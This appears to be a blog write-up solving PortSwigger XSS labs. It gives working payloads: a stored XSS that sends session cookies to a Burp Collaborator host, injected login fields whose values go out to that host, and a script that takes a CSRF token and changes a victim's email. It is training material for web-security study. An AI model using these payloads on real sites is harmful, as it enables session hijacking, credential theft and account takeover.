Apr 18
Cross site scripting | xss explain(PORTSWIGGER solve)
Hello guys this is my third post regarding any topic in medium, in today’s blog i’m gone tall to the xss vulnerability with the help of https://portswigger.net labs. so we solve the reflected xss. we can read about the vulnerability in the portswigger lab. so start with first lab.
click on the lab and read about the lab description.
This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.To solve the lab, perform a cross-site scripting attack that calls the alert function.
so with the help of this info we can start our processing.
we have a search bar where we put our payload and press enter.
<script>alert(1)</script>
Bingo we solve our lab.
Lab 2- Impact of reflected XSS attacks (Exploiting cross-site scripting to steal cookies)
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim’s session cookie, then use this cookie to impersonate the victim
For this lab we are going to enter a post and make a comment while intercepting all packets in the background using the burpsuite tool. Then we send it to the repeater and prepare our payload.<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>So we send it on the repeater, and wait for the response on the burp collaborator.Also select payload in burp and press CTRL+U to URL encode in burp.
in Burp Collaborator client click on the poll now button. Inspect the HTTP request in collaborator and you get the session value.
secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6lcopy and paste it into your Home intercepted request in burp and replace with your session value you got it.
Lab 3 : Exploiting cross-site scripting to capture passwords
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim’s username and password then use these credentials to log in to the victim’s account.
we build our payload according to the requirement.
<input required="" type="username" name="username">
<input required="" type="password" name="password">and capture the value stored on that fields. with the help of JS DOM.
document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].valueso our final payload look like this.
<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>put this value into your intercepted proxy request in comment field like this. Also select payload in burp and press CTRL+U to URL encode in burp.
the result is like.
But it sends it without information, this can happen because at the time of making the document.location the autocomplete has not yet been carried out, so we will use the onchange attribute.<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">
Now we get our credentials like this.
administrator:ef6gbovly0a77qvxul8i
Lab: Exploiting XSS to perform CSRF
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials:
wiener:peter
first we try to change the email using the given credential. so our capture request look like this.
POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1
email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTfbased on the request we observed we conclude and design the payload like.
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=a@a.a')
};
</script>So we send it for comment and finish the lab.
That’s all for our xss labs for now.
